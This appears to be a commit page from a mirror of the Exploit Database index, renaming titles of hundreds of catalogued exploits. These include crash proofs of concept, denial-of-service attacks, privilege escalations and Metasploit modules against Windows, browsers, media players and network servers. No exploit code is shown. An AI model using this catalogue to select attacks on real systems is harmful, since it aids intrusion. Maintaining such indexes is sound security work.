bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-04-02

Browse source 
6 new exploits

Microsoft Internet Explorer 11 - Crash PoC (1)
Microsoft Internet Explorer 11 - Crash (PoC) (1)

Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031)
Microsoft Windows SQL Server - Remote  Denial of Service (MS03-031)

Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow PoC (MS03-046)
Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046)

Microsoft Windows - MSDTC Service Remote Memory Modification PoC (MS05-051)
Microsoft Windows - MSDTC Service Remote Memory Modification (PoC) (MS05-051)

Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (1)
Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (1)

Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (1)
Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)

Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (3)
Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)

Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (2)
Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)

Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC (Metasploit)
Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)

Microsoft Windows - DNS Resolution Remote Denial of Service PoC (MS06-041)
Microsoft Windows - DNS Resolution Remote Denial of Service (PoC) (MS06-041)

Microsoft Excel - Malformed Palette Record Denial of Service PoC (MS07-002)
Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002)

BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow PoCs
BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow (PoCs)

Visual Basic - 'vbe6.dll' Local Stack Overflow PoC / Denial of Service
Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service

freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated
freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)

Microsoft Internet Explorer GDI+ - PoC (MS08-052)
Microsoft Internet Explorer GDI+ - (PoC) (MS08-052)

Microsoft Windows - GDI+ PoC (MS08-052) (2)
Microsoft Windows - GDI+ (PoC) (MS08-052) (2)
Microsoft Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)
GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/Denial of Service
Microsoft Windows - InternalOpenColorProfile Heap Overflow (PoC) (MS08-046)
GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service

Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)
Apple Safari - 'ARGUMENTS' Array Integer Overflow (PoC) (New Heap Spray)

Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2)
Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)

eZip Wizard 3.0 - Local Stack Buffer Overflow PoC (SEH)
eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH)

Chasys Media Player 1.1 - '.pls' Local Buffer Overflow PoC (SEH)
Chasys Media Player 1.1 - '.pls' Local Buffer Overflow (PoC) (SEH)

Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)
Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (1)

Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (2)
Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (2)

Microsoft Internet Explorer - EMBED Memory Corruption PoC (MS09-014)
Microsoft Internet Explorer - EMBED Memory Corruption (PoC) (MS09-014)

DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow PoCs
DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoCs)

AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow PoC (SEH)
AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow (PoC) (SEH)

MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC
MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String (PoC)

otsAV DJ/TV/Radio - Multiple Local Heap Overflow PoCs
otsAV DJ/TV/Radio - Multiple Local Heap Overflow (PoCs)

JetAudio 7.5.3 COWON Media Center - '.wav' Crash
Streaming Audio Player 0.9 - (skin) Local Stack Overflow PoC (SEH)
Soritong MP3 Player 1.0 - (SKIN) Local Stack Overflow PoC (SEH)
Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC)  (SEH)
Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)

Tuniac 090517c - '.m3u' Local File Crash (PoC)

HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)
HTML Email Creator & Sender 2.3 - Local Buffer Overflow (PoC) (SEH)
PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (1)
PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (2)
PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (1)
PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (2)

BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow PoC (2)
BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow (PoC) (2)

Eureka Email Client 2.2q - PoC Buffer Overflow
Eureka Email Client 2.2q - Buffer Overflow (PoC)

Microsoft Windows 7 / Server 2008 R2 - Remote Kernel Crash
Microsoft Windows 7 / 2008 R2 - Remote Kernel Crash

Picpuz 2.1.1 - Buffer Overflow Denial of Service/PoC
Picpuz 2.1.1 - Buffer Overflow Denial of Service (PoC)

Total MultiMedia Features - Denial of Service PoC for Sony Ericsson Phones
Total MultiMedia Features -  Sony Ericsson Phones Denial of Service (PoC)

Mozilla Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service
Mozilla Firefox 3.6 - (XML parser) Memory Corruption (PoC) / Denial of Service

iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service/PoC
iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service (PoC)

RCA DCM425 Cable Modem - micro_httpd Denial of Service/PoC
RCA DCM425 Cable Modem - 'micro_httpd' Denial of Service (PoC)

Free MP3 CD Ripper 2.6 - '.wav' PoC
Free MP3 CD Ripper 2.6 - '.wav' (PoC)

Anyzip 1.1 - '.zip' PoC (SEH)
Anyzip 1.1 - '.zip' (PoC) (SEH)

Microsoft Windows - SMB Client-Side Bug PoC (MS10-006)
Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006)

Webby WebServer - PoC SEH control
Webby WebServer - SEH Control (PoC)

FreeBSD 8.0 ftpd - off-by one PoC (FreeBSD-SA-10:05)
FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off- By One (PoC)

Microsoft Windows Vista/Server 2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free
Microsoft Windows Vista/2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free

AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)
AoAAudioExtractor 2.0.0.0 - ActiveX (PoC) (SEH)

Mozilla Firefox - Memory Corruption PoC (Simplified)
Mozilla Firefox - (Simplified) Memory Corruption (PoC)

Microsoft Windows - Win32k Pointer Dereferencement PoC (MS10-098)
Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)

Elecard MPEG Player 5.7 - Local Buffer Overflow PoC (SEH)
Elecard MPEG Player 5.7 - Local Buffer Overflow (PoC) (SEH)

Microsoft Windows XP - WmiTraceMessageVa Integer Truncation PoC (MS11-011)
Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011)

Real player 14.0.2.633 - Buffer Overflow / Denial of ServiceExploit
Real player 14.0.2.633 - Buffer Overflow / Denial of Service
IrfanView 4.28 - .ICO With Transparent Colour Denial of Service / Remote Denial of Service
IrfanView 4.28 - .ICO Without Transparent Colour Denial of Service / Remote Denial of Service
IrfanView 4.28 - '.ICO' With Transparent Colour Denial of Service / Remote Denial of Service
IrfanView 4.28 - '.ICO' Without Transparent Colour Denial of Service / Remote Denial of Service

Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel Denial of Service
Microsoft Windows Vista/2008 - 'nsiproxy.sys' Local Kernel Denial of Service

D-Link DSL-2650U - Denial of Service/PoC
D-Link DSL-2650U - Denial of Service (PoC)

Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun PoC (MS11-077)
Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077)

Opera 11.52 - PoC Denial of Service
Opera 11.52 - Denial of Service (PoC)

Microsoft Win32k - Null Pointer De-reference PoC (MS11-077)
Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077)

Microsoft Windows - 'afd.sys' PoC (MS11-046)
Microsoft Windows - 'afd.sys' (PoC) (MS11-046)

Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (MS12-034)
Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)

Wyse - Machine Remote Power off (DOS) without any Privilege (Metasploit)
Wyse - Unauthenticated Machine Remote Power Off )Denial of Service) (Metasploit)

Microsoft Windows Server 2000/NT 4.0 - TCP/IP Printing Service Denial of Service
Microsoft Windows NT 4/2000 - TCP/IP Printing Service Denial of Service

Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)
Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC)
FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1)
FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2)
FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)
FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)
FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1)
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2)
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)

Microsoft Windows Server 2000/NT - Terminal Server Service RDP Denial of Service
Microsoft Windows NT / 2000 - Terminal Server Service RDP Denial of Service
Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (1)
Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (2)
Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (1)
Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (2)
Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)
Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)
Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (1)
Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (2)

Microsoft PoCket Internet Explorer 3.0 - Denial of Service
Microsoft Pocket Internet Explorer 3.0 - Denial of Service

Microsoft Windows - HWND_BROADCAST PoC (MS13-005)
Microsoft Windows - HWND_BROADCAST (PoC) (MS13-005)

Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash PoC
Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash (PoC)

Apple Safari 3 for Windows - Document.Location Denial of Service
Apple Safari 3 for Windows - 'Document.Location' Denial of Service

PotPlayer 1.5.42509 Beta - Denial of Service (Integer Division by Zero Exploit)
PotPlayer 1.5.42509 Beta - Integer Division by Zero Denial of Service

Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow
Apple Safari 3.0.x for Windows - 'Document.Location.Hash' Buffer Overflow

Android Web Browser - GIF File Heap Based Buffer Overflow
Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow

Android Web Browser - BMP File Integer Overflow
Google Android Web Browser - '.BMP' File Integer Overflow

Gold MP4 Player 3.3 - Buffer Overflow PoC (SEH)
Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH)

Microsoft Windows Server 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service
Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service

Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)
Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash (PoC) (MS14-035)

Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)
Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035)

Microsoft Internet Explorer - Memory Corruption PoC (MS14-029)
Microsoft Internet Explorer - Memory Corruption (PoC) (MS14-029)

UniPDF 1.1 - Crash (PoC) (SEH)

Brasero CD/DVD Burner 3.4.1 - '.m3u' Buffer Overflow Crash (PoC)

Microsoft Windows - 'HTTP.sys' PoC (MS15-034)
Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034)

UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)

Microsoft Internet Explorer 11 - Crash PoC (2)
Microsoft Internet Explorer 11 - Crash (PoC) (2)

Apple macOS/IOS 10.12.2(16C67) - mach_msg Heap Overflow
Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow

QNX RTOS 6.3.0 - Insecure rc.local Permissions Plus System Crash
QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation
Microsoft Windows - NtClose DeadLock PoC (MS06-030)
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)
Microsoft Windows - NtClose DeadLock (PoC) (MS06-030)
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation (PoC) (MS06-030)

PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow
PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - 'zip://' URL Wrapper Buffer Overflow

Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation
Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation

Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)
Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow (PoC) (SEH)

Streaming Audio Player 0.9 - (skin) Local Stack Overflow (SEH)
Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (SEH)

Tuniac 090517c - '.m3u' Local File Crash (PoC)

Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (1)
Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)

Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (1)
Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit)

Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (1)
Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit)

Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)

Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)
Microsoft HTML Help Workshop 4.74 - '.hhp' Index Buffer Overflow (Metasploit) (3)

Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)
Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2)
Microsoft HTML Help Workshop 4.74 - '.hhp' Cotent Buffer Overflow (Metasploit) (2)

Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (2)

Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2)

Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)
Microsoft HTML Help Workshop 4.74 - '.hhp' compiled Buffer Overflow (Metasploit) (4)

Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (without egg-hunter) (Metasploit)
Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without Egg-Hunter) (Metasploit)

PHP 5.3.6 - Buffer Overflow PoC (ROP)
PHP 5.3.6 - Buffer Overflow (ROP) (PoC)

Microsoft Windows Server 2000/NT 4 - DLL Search Path
Microsoft Windows NT 4/2000 - DLL Search Path

Microsoft Windows Server 2000/NT 4 - NTFS File Hiding
Microsoft Windows NT 4/2000 - NTFS File Hiding

Microsoft Windows Server 2000/NT 4.0 - Process Handle Local Privilege Elevation
Microsoft Windows NT 4/2000 - Process Handle Local Privilege Elevation
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (1)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (2)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (3)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (4)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (5)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (6)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (7)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (8)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (1)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (2)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (3)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (4)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (5)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (6)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (7)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (8)
Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (1)
Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (2)
Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (1)
Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (2)

Microsoft Windows Server 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)
Microsoft Windows NT 4/2000 - Local Descriptor Table Privilege Escalation (MS04-011)

Microsoft Windows Server 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)
Microsoft Windows NT 4/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)

PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation
PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_parameters' Argument Arbitrary File Creation

Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)

Microsoft Windows Server 2003/2008/XP/Vista - WMI Service Isolation Privilege Escalation
Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation

Adobe Reader for Android - addJavascriptInterface Exploit (Metasploit)
Adobe Reader for Android - 'addJavascriptInterface' Exploit (Metasploit)

UniPDF 1.1 - Crash PoC (SEH overwritten)

Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash (PoC)

UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)

Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass PoC (MS15-052)
Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (PoC) (MS15-052)

Android - get_user/put_user Exploit (Metasploit)
Google Android - get_user/put_user Exploit (Metasploit)

Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)
Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)

Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)

Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)
Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (2)
Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)
Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)

MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)

MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)

ProFTPd 1.2.9rc2 - ASCII File Remote Code Execution
ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (1)

Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)
Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit)
MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (1)
Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)
Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit)
MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit)
Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)

Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (2)
Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (2)

Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow
Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Buffer Overflow

Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit)
Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (1)
D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1)
Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)
D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)

ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution
ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (2)

Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027)
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (PoC) (MS07-027)

CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (1)
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)

ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow
ImageStation - 'SonyISUpload.cab' 1.0.0.38 ActiveX Buffer Overflow

IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow
IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow

Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069)
Microsoft XML Core Services DTD - Cross-Domain Scripting (PoC) (MS08-069)

Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (PoC) (MS09-002)

Apple Mac OSX - Java applet Remote Deserialization Remote PoC (2)
Apple Mac OSX - Java applet Remote Deserialization Remote (PoC) (2)

Microsoft Windows live messenger plus! fileserver 1.0 - Directory Traversal
Microsoft Windows Live Messenger Plus! Fileserver 1.0 - Directory Traversal

JetAudio 7.5.3 COWON Media Center - '.wav' Crash

DistCC Daemon - Command Execution (Metasploit) (1)
DistCC Daemon - Command Execution (Metasploit)
Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)
mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)
Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)
mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)

Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (1)
Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)

Veritas NetBackup - Remote Command Execution (Metasploit) (1)
Veritas NetBackup - Remote Command Execution (Metasploit)

Pegasus Mail Client 4.51 - PoC Buffer Overflow
Pegasus Mail Client 4.51 - Buffer Overflow (PoC)

Irix LPD tagprinter - Command Execution (Metasploit) (1)
Irix LPD tagprinter - Command Execution (Metasploit)

Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (1)
Xtacacsd 4.1.2 - 'report()' Buffer Overflow (Metasploit)

Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1)
Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)

Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (2)
Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit)

Tandberg E & EX & C Series Endpoints - Default Credentials for Root Account
Tandberg E & EX & C Series Endpoints - Default Root Account Credentials

Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (2)

Veritas NetBackup - Remote Command Execution (Metasploit) (2)

Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (2)
Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)
D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2)
Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (2)

CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (1)
CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit)

MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (2)

Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2)

Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (1)

CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (2)

httpdx - tolog() Function Format String (Metasploit) (1)
httpdx - 'tolog()' Function Format String (Metasploit) (1)

Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)
Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit)

httpdx - tolog() Function Format String (Metasploit) (2)
httpdx - 'tolog()' Function Format String (Metasploit) (2)

Irix LPD tagprinter - Command Execution (Metasploit) (2)

Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2)

DistCC Daemon - Command Execution (Metasploit) (2)
HP Data Protector Client 6.11 - EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)
HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution PoC (ZDI-11-055)
HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC)
HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (PoC)

Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1)
Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1)

Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)
Opera 10/11 - Bad Nesting with Frameset Tag Memory Corruption (Metasploit)

Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (2)
Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)

HP SiteScope - Remote Code Execution (Metasploit) (1)
HP SiteScope (Linux/Windows) - Remote Code Execution (Metasploit)

Microsoft Windows Server 2000/NT 4/XP - Help Facility ActiveX Control Buffer Overflow
Microsoft Windows XP/2000/NT 4 - Help Facility ActiveX Control Buffer Overflow

Microsoft Windows Server 2000/NT 4 Media Services - 'nsiislog.dll' Remote Buffer Overflow
Microsoft Windows NT 4/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow

thttpd 2.2x - defang Remote Buffer Overflow
thttpd 2.2x - 'defang' Remote Buffer Overflow

Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (2)
Novell ZENworks Configuration Management 10 SP3 / 11 SP2 - Remote Execution (Metasploit)

Dovecot with Exim - sender_address Parameter Remote Command Execution
Dovecot with Exim - 'sender_address' Parameter Remote Command Execution

HP SiteScope - Remote Code Execution (Metasploit) (2)
HP SiteScope (Windows) - Remote Code Execution (Metasploit)

Western Digital Arkeia - Remote Code Execution (Metasploit) (1)
Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)

CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (2)

Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)

Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (1)
Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)

